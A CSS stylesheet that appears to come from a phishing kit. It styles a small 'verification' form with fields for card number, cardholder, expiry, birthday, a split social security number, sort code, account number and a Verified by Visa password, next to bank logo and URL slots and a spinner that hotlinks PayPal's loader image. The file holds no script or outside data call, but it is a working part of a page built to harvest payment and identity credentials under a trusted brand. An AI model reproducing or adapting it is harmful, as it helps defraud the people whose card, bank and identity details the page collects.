@font-face{
	font-family:xyssx;
	font-style:normal;
	font-weight:300;
	src:url(../fonts/xyssx-Regular.eot);
	src:url(../fonts/xyssx-Regular.woff2) format('woff2'),url(../fonts/xyssx-Regular.woff) format('woff'),url(../fonts/xyssx-Regular.svg#69ac2c9fc1e0803e59e06e93859bed03) format('svg')
}
#boxInfo input{
	background:no-repeat
}
#container{
	width:360px;
	border:2px solid #1b1b1b;
	margin:25px auto auto;
	padding:10px;
	font-family:sans-serif;
	font-size:12px
}
#cardholder input,#cardnumber input{
	border:none
}
#cardholder input{
	text-overflow:ellipsis;
	font-weight:700;
	margin-left:4px
}
.mask,.spinner,.transition{
	margin:0;
	right:0;
	bottom:0;
	text-align:center
}
.hasError{
	border:1px solid #d20000;
	color:#d20000!important
}
.hide{
	display:none
}
.transition{
	position:fixed;
	top:43%;
	left:0;
	z-index:9999
}
.transition:after{
	content:'';
	position:fixed;
	z-index:-1;
	top:0;
	right:0;
	bottom:0;
	left:0;
	background:#fff;
	-ms-filter:alpha(opacity=90);
	filter:alpha(opacity=90)
}
.transition span{
	position:relative;
	left:-5px;
	top:-5px;
	font-family:xyssx,Helvetica Neue,Arial,sans-serif
}
@keyframes rotation{
	from{
		transform:rotate(0)
}
	to{
		transform:rotate(359deg)
}
}
.lower-than-ie10 .spinner:before,.lower-than-ie9 .spinner:before{
	background:url(https://www.paypalobjects.com/webstatic/checkout/hermes/icon_loader_med.gif) top center no-repeat;
	border:0;
	width:50px;
	height:50px
}
.mask,.spinner{
	position:fixed;
	top:43%;
	left:0;
	z-index:9999
}
.mask:after,.spinner:after{
	content:'';
	position:fixed;
	z-index:-1;
	top:0;
	right:0;
	bottom:0;
	left:0;
	background:#fff;
	-moz-opacity:.9;
	-khtml-opacity:.9;
	-webkit-opacity:.9;
	opacity:.9;
	-ms-filter:alpha(opacity=90);
	filter:alpha(opacity=90)
}
.spinner:before{
	content:"";
	display:block;
	margin:0 auto 10px;
	text-align:center;
	width:34px;
	height:34px;
	border-left:8px solid #000;
	border-left:8px solid rgba(0,0,0,.2);
	border-right:8px solid #000;
	border-right:8px solid rgba(0,0,0,.2);
	border-bottom:8px solid #000;
	border-bottom:8px solid rgba(0,0,0,.2);
	border-top:8px solid #2180c0;
	border-radius:50px;
	-webkit-animation:rotation .7s infinite linear;
	-moz-animation:rotation .7s infinite linear;
	-o-animation:rotation .7s infinite linear;
	animation:rotation .7s infinite linear
}
#imgCard,#urlBank{
	text-align:right
}
#phoneBank,#urlBank,.dinlineblock{
	display:inline-block;
	width:49%
}
.xysnewLoaderx{
	position:absolute;
	top:45px;
	left:50%;
	margin-left:-67px;
	color:#696969;
	font-family:sans-serif;
	font-size:15px
}
#panelCodeTxt,#panelcode span{
	position:relative
}
#imgBank img{
	max-width:100%;
	height:70px
}
#imgCard img{
	height:50px
}
#title{
	font-size:15px;
	color:#777;
	font-weight:700
}
#boxInfo{
	margin:25px 0 15px
}
#boxInfo div label:first-child{
	width:130px;
	display:inline-block
}
#boxInfo div input{
	padding:2px;
	display:inline-block;
	color:#5a5a5a
}
#boxInfo div#cardnumber input{
	position:relative;
	top:-9.5px
}
#boxInfo div#birthday input,#boxInfo div#expirydate input,#boxInfo div#sortcode input,#boxInfo div#ssn input#xysss2x{
	display:inline-block;
	width:16px
}
#xysbirthdayYYx{
	width:31px!important
}
#accnumTxt,#spDate{
	margin-left:5px;
	color:#868686
}
#accountnumber,#expirydate,#sortcode,#ssn,#vbvpassword{
	margin-top:4px
}
#panelcode input{
	width:23px
}
#panelcode span img{
	height:25px;
	top:-7px;
	position:absolute;
	margin-left:5px
}
#panelCodeTxt{
	display:inline-block;
	width:125px;
	font-size:10px;
	margin-left:48px;
	top:3px
}
#boxInfo div#ssn input#xysss1x{
	display:inline-block;
	width:23px
}
#boxInfo div#ssn input#xysss3x{
	display:inline-block;
	width:30px
}
#boxInfo div#accountnumber input{
	display:inline-block;
	width:60px
}
#boxInfo div#vbvpassword input{
	display:inline-block;
	width:100px
}
input[type=submit]{
	border-width:1px;
	border-color:#949494;
	border-style:solid;
	border-radius:2px;
	background-color:#eaeaea;
	padding:5px 8px;
	height:auto;
	font-size:12px;
	font-family:Arial;
	font-weight:700;
	box-shadow:inset 0 0 10px rgba(0,0,0,.07);
	background-image:linear-gradient(to bottom,#fefefe,#f1f1f1);
	transition:all .1s ease-out;
	color:#666;
	cursor:pointer
}
input[type=submit]:hover{
	background-color:#1C54A3;
	border:1px solid #1C54A3;
	color:#fff;
	text-decoration:underline;
	background-image:linear-gradient(to bottom,#1C54A3,#266aca)
}
#infoBank{
	margin-top:10px
}
#urlBank{
	text-overflow:ellipsis;
	overflow:hidden
}
